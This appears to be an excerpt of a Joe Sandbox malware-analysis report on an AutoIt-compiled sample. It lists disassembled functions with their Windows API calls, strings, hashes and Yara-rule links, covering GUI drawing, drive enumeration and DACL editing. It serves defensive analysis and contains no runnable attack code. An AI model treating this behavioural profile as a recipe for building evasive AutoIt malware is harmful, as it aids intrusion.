Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4009bbde6e72cdddfa34568285ef39fd46898b9e016b1616efd683905f6ce061
Instruction ID: f9876962872e08a81edd2b0ee25c4a1598a5e356921b6e1a09ebc2b2f35ba5da
Opcode Fuzzy Hash: 4009bbde6e72cdddfa34568285ef39fd46898b9e016b1616efd683905f6ce061
Instruction Fuzzy Hash: 8C02F8B0E1051AFBDF04DF94D881AADB7B5FF54300F118169E916DB291EB719E21DB80

Function 00207A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edfd845b4db257ec403ecf9dfd831cad4244c5ce6c4889a0281a109b7ff2072b
Instruction ID: b10a44ee874cd31bbae6200e561cce5ee65a37cbd2923e63fd0e811f179534b0
Opcode Fuzzy Hash: edfd845b4db257ec403ecf9dfd831cad4244c5ce6c4889a0281a109b7ff2072b
Instruction Fuzzy Hash: DC614861F3874B66EB345D288895BBF3394DF41708F10091AE882DB2C3DA91BE72C755

Function 00207CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 207ad3c5d84221c7009bf231d04418d9e3ddb1607dee0175769e8ab51e14d55f
Instruction ID: 8c870ce9cc5ece581700b7947ca5bf49aaaaf39a8f0e42e508c9c3bd69816410
Opcode Fuzzy Hash: 207ad3c5d84221c7009bf231d04418d9e3ddb1607dee0175769e8ab51e14d55f
Instruction Fuzzy Hash: 9A615B71E3870B67DB384E288895BBF2394AF42700F100959E982DB6C3EB52FD72C655

Function 00262ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00262B30
DeleteObject.GDI32(00000000), ref: 00262B43
DestroyWindow.USER32 ref: 00262B52
GetDesktopWindow.USER32 ref: 00262B6D
GetWindowRect.USER32(00000000), ref: 00262B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00262CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00262CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262CF8
GetClientRect.USER32(00000000,?), ref: 00262D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00262D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262D80
GlobalLock.KERNEL32(00000000), ref: 00262D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262D98
GlobalUnlock.KERNEL32(00000000), ref: 00262DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262DA8
GlobalFree.KERNEL32(00000000), ref: 00262DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0027FC38,00000000), ref: 00262DDB
GlobalFree.KERNEL32(00000000), ref: 00262DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00262E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00262E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0026303F

Strings

, xrefs: 00262FC5
static, xrefs: 00262D3A, 00262E91
DISPLAY, xrefs: 00262EA2
AutoIt v3, xrefs: 00262CF2

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: d4ecd57139288a69916aa6c8352bfde85cf8ef6c9c7caa0b9e605f0395828364
Instruction ID: 07840734cb572652ffd9b797c4735b38b60f2a34b5a74e1a52897f226bee18a7
Opcode Fuzzy Hash: d4ecd57139288a69916aa6c8352bfde85cf8ef6c9c7caa0b9e605f0395828364
Instruction Fuzzy Hash: 1C029C71910605EFDB14DF64EC8DEAE7BB9EF48310F148158F919AB2A1DB70AD84CB60

Function 002770D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0027712F
GetSysColorBrush.USER32(0000000F), ref: 00277160
GetSysColor.USER32(0000000F), ref: 0027716C
SetBkColor.GDI32(?,000000FF), ref: 00277186
SelectObject.GDI32(?,?), ref: 00277195
InflateRect.USER32(?,000000FF,000000FF), ref: 002771C0
GetSysColor.USER32(00000010), ref: 002771C8
CreateSolidBrush.GDI32(00000000), ref: 002771CF
FrameRect.USER32(?,?,00000000), ref: 002771DE
DeleteObject.GDI32(00000000), ref: 002771E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00277230
FillRect.USER32(?,?,?), ref: 00277262
GetWindowLongW.USER32(?,000000F0), ref: 00277284

Part of subcall function 002773E8: GetSysColor.USER32(00000012), ref: 00277421
Part of subcall function 002773E8: SetTextColor.GDI32(?,?), ref: 00277425
Part of subcall function 002773E8: GetSysColorBrush.USER32(0000000F), ref: 0027743B
Part of subcall function 002773E8: GetSysColor.USER32(0000000F), ref: 00277446
Part of subcall function 002773E8: GetSysColor.USER32(00000011), ref: 00277463
Part of subcall function 002773E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00277471
Part of subcall function 002773E8: SelectObject.GDI32(?,00000000), ref: 00277482
Part of subcall function 002773E8: SetBkColor.GDI32(?,00000000), ref: 0027748B
Part of subcall function 002773E8: SelectObject.GDI32(?,?), ref: 00277498
Part of subcall function 002773E8: InflateRect.USER32(?,000000FF,000000FF), ref: 002774B7
Part of subcall function 002773E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002774CE
Part of subcall function 002773E8: GetWindowLongW.USER32(00000000,000000F0), ref: 002774DB

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: afaeeeca26115a00e9d87588447fbe86898c351f95f777c1671839941c93093c
Instruction ID: d81d310abcd9489c077dfe015a8c15e303af32b4d56363f9749500444f12aaec
Opcode Fuzzy Hash: afaeeeca26115a00e9d87588447fbe86898c351f95f777c1671839941c93093c
Instruction Fuzzy Hash: 52A1A272018302AFD7109F70EC4CA5B7BA9FF49320F604A2DF96AA61E1D771E994CB51

Function 00262711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0026273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0026286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 002628A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 002628B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00262900
GetClientRect.USER32(00000000,?), ref: 0026290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00262955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00262964
GetStockObject.GDI32(00000011), ref: 00262974
SelectObject.GDI32(00000000,00000000), ref: 00262978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00262988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00262991
DeleteDC.GDI32(00000000), ref: 0026299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002629C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 002629DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00262A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00262A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00262A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00262A77
GetStockObject.GDI32(00000011), ref: 00262A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00262A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00262A97

Strings

msctls_progress32, xrefs: 00262A13
static, xrefs: 0026294F, 00262A71
DISPLAY, xrefs: 0026295A
AutoIt v3, xrefs: 002628F8

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: b7bd14140c10ec6aaddf79b9d08c98483c356778f297cad41de44428f986f42c
Instruction ID: 38a28f9c58b7e27d659387f92281a712651c845839ce55acdb4c117d70c6acb4
Opcode Fuzzy Hash: b7bd14140c10ec6aaddf79b9d08c98483c356778f297cad41de44428f986f42c
Instruction Fuzzy Hash: 85B15D71A10605AFEB14DF78EC89FAEBBA9EF48710F104258F915E7290D770AD50CBA0

Function 00254ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00254AED
GetDriveTypeW.KERNEL32(?,0027CB68,?,\\.\,0027CC08), ref: 00254BCA
SetErrorMode.KERNEL32(00000000,0027CB68,?,\\.\,0027CC08), ref: 00254D36

Strings

USB, xrefs: 00254CB4
SSA, xrefs: 00254CA6
FileBackedVirtual, xrefs: 00254CEC
SSD, xrefs: 00254C4A
iSCSI, xrefs: 00254CC2
CDROM, xrefs: 00254BFB
SCSI, xrefs: 00254C8A
RAID, xrefs: 00254CBB
MMC, xrefs: 00254CDE
Network, xrefs: 00254C02
ATAPI, xrefs: 00254C91
1394, xrefs: 00254C9F
Fixed, xrefs: 00254C09
SAS, xrefs: 00254CC9
Unknown, xrefs: 00254BED, 00254C83
RAMDisk, xrefs: 00254BF4
ATA, xrefs: 00254C98
Virtual, xrefs: 00254CE5
Fibre, xrefs: 00254CAD
Removable, xrefs: 00254C10, 00254C15
\\.\, xrefs: 00254B3F
SATA, xrefs: 00254CD0
PhysicalDrive, xrefs: 00254B76

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: cbd182dd935ba4a02ec739d1d4f532b079a093815c0b64cbc76eb5179876ff1c
Instruction ID: 10ea7f284131987e3e3361fb1734332197813f3543c505b63f25dd19210a5efa
Opcode Fuzzy Hash: cbd182dd935ba4a02ec739d1d4f532b079a093815c0b64cbc76eb5179876ff1c
Instruction Fuzzy Hash: 4F610630635506ABCB04FF24C98596CF7B1AB8634BB284116FC06AB291CF71DDE9DB49

Function 002773E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00277421
SetTextColor.GDI32(?,?), ref: 00277425
GetSysColorBrush.USER32(0000000F), ref: 0027743B
GetSysColor.USER32(0000000F), ref: 00277446
CreateSolidBrush.GDI32(?), ref: 0027744B
GetSysColor.USER32(00000011), ref: 00277463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00277471
SelectObject.GDI32(?,00000000), ref: 00277482
SetBkColor.GDI32(?,00000000), ref: 0027748B
SelectObject.GDI32(?,?), ref: 00277498
InflateRect.USER32(?,000000FF,000000FF), ref: 002774B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002774CE
GetWindowLongW.USER32(00000000,000000F0), ref: 002774DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0027752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00277554
InflateRect.USER32(?,000000FD,000000FD), ref: 00277572
DrawFocusRect.USER32(?,?), ref: 0027757D
GetSysColor.USER32(00000011), ref: 0027758E
SetTextColor.GDI32(?,00000000), ref: 00277596
DrawTextW.USER32(?,002770F5,000000FF,?,00000000), ref: 002775A8
SelectObject.GDI32(?,?), ref: 002775BF
DeleteObject.GDI32(?), ref: 002775CA
SelectObject.GDI32(?,?), ref: 002775D0
DeleteObject.GDI32(?), ref: 002775D5
SetTextColor.GDI32(?,?), ref: 002775DB
SetBkColor.GDI32(?,?), ref: 002775E5

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: f68e8670562502e7f66cb95a2bfb241cfa748e1f4a13eef331789804f03c6332
Instruction ID: 1a18e159cb52d83d0d52bb0d07567f01f83afe5f4964d7d30fa5b87bf98fda8e
Opcode Fuzzy Hash: f68e8670562502e7f66cb95a2bfb241cfa748e1f4a13eef331789804f03c6332
Instruction Fuzzy Hash: F8614272900219AFDF119FA4DC49AEE7F79EB08320F218125F919B72A1D7759990CF90

Function 00270FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00271128
GetDesktopWindow.USER32 ref: 0027113D
GetWindowRect.USER32(00000000), ref: 00271144
GetWindowLongW.USER32(?,000000F0), ref: 00271199
DestroyWindow.USER32(?), ref: 002711B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002711ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0027120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0027121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00271232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00271245
IsWindowVisible.USER32(00000000), ref: 002712A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 002712BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 002712D0
GetWindowRect.USER32(00000000,?), ref: 002712E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0027130E
GetMonitorInfoW.USER32(00000000,?), ref: 00271328
CopyRect.USER32(?,?), ref: 0027133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 002713AA

Strings

(, xrefs: 0027131B
0, xrefs: 002710D3
tooltips_class32, xrefs: 002711E6

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: b41b1344c0fb157a5fa8c660e754e33779751ae2c0eaf71af8099822ef27fdfa
Instruction ID: c4019239c460d443752776e00630d213cdf5a3da24cfb16ff920b9dfbc50a74e
Opcode Fuzzy Hash: b41b1344c0fb157a5fa8c660e754e33779751ae2c0eaf71af8099822ef27fdfa
Instruction Fuzzy Hash: 02B18971618341AFD704DF69D889B6EBBE4EF84310F00891CF99D9B2A1CB71E864CB91

Function 00270241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002702E5
_wcslen.LIBCMT ref: 0027031F
_wcslen.LIBCMT ref: 00270389
_wcslen.LIBCMT ref: 002703F1
_wcslen.LIBCMT ref: 00270475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002704C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00270504

Part of subcall function 001FF9F2: _wcslen.LIBCMT ref: 001FF9FD

Part of subcall function 0024223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00242258
Part of subcall function 0024223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0024228A

Strings

SELECTCLEAR, xrefs: 0027052D
SELECT, xrefs: 00270548
GETSELECTED, xrefs: 002705E1
DESELECT, xrefs: 0027059C
FINDITEM, xrefs: 00270627
SELECTINVERT, xrefs: 0027057E
GETITEMCOUNT, xrefs: 00270316, 00270337
GETTEXT, xrefs: 002703EC, 00270407
SELECTALL, xrefs: 00270515
GETSUBITEMCOUNT, xrefs: 00270384, 0027039F
ISSELECTED, xrefs: 002704DD
GETSELECTEDCOUNT, xrefs: 00270470, 0027048B
VIEWCHANGE, xrefs: 00270675

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 00745d47c24457dfcb04d4562a7dee7d671b23ed5f663239ab589f5b35b729a4
Instruction ID: 399f1b9f37ac3a7e353928746708e00fec25ddea3c5f99ddb24fa06f2298bf68
Opcode Fuzzy Hash: 00745d47c24457dfcb04d4562a7dee7d671b23ed5f663239ab589f5b35b729a4
Instruction Fuzzy Hash: 7FE1C131228642DFC714DF25C89083EB3E6BF98314F54895DF89A9B2A1DB70ED5ACB41

Function 001F8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001F8968
GetSystemMetrics.USER32(00000007), ref: 001F8970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001F899B
GetSystemMetrics.USER32(00000008), ref: 001F89A3
GetSystemMetrics.USER32(00000004), ref: 001F89C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001F89E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001F89F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 001F8A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 001F8A3C
GetClientRect.USER32(00000000,000000FF), ref: 001F8A5A
GetStockObject.GDI32(00000011), ref: 001F8A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 001F8A81

Part of subcall function 001F912D: GetCursorPos.USER32(?), ref: 001F9141
Part of subcall function 001F912D: ScreenToClient.USER32(00000000,?), ref: 001F915E
Part of subcall function 001F912D: GetAsyncKeyState.USER32(00000001), ref: 001F9183
Part of subcall function 001F912D: GetAsyncKeyState.USER32(00000002), ref: 001F919D

SetTimer.USER32(00000000,00000000,00000028,001F90FC), ref: 001F8AA8

Strings

AutoIt v3 GUI, xrefs: 001F8A20

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 68ad5531b7ca8b1d0742bf682ecf2df3d830ce1860d2381e1f9d51a3b49cbd93
Instruction ID: b99d2fbe9adc8aa6a58c7610a5e5b34fb010e9589eccb71702b933bcb433b4c5
Opcode Fuzzy Hash: 68ad5531b7ca8b1d0742bf682ecf2df3d830ce1860d2381e1f9d51a3b49cbd93
Instruction Fuzzy Hash: EEB18F71A0020AAFDF14DFA8DC99BAE7BB5FB48314F504229FA15A7290DB70E951CF50

Function 00240D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002410F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00241114
Part of subcall function 002410F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 00241120
Part of subcall function 002410F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 0024112F
Part of subcall function 002410F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 00241136
Part of subcall function 002410F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0024114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00240DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00240E29
GetLengthSid.ADVAPI32(?), ref: 00240E40
GetAce.ADVAPI32(?,00000000,?), ref: 00240E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00240E96
GetLengthSid.ADVAPI32(?), ref: 00240EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00240EB5
HeapAlloc.KERNEL32(00000000), ref: 00240EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00240EDD
CopySid.ADVAPI32(00000000), ref: 00240EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00240F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00240F35
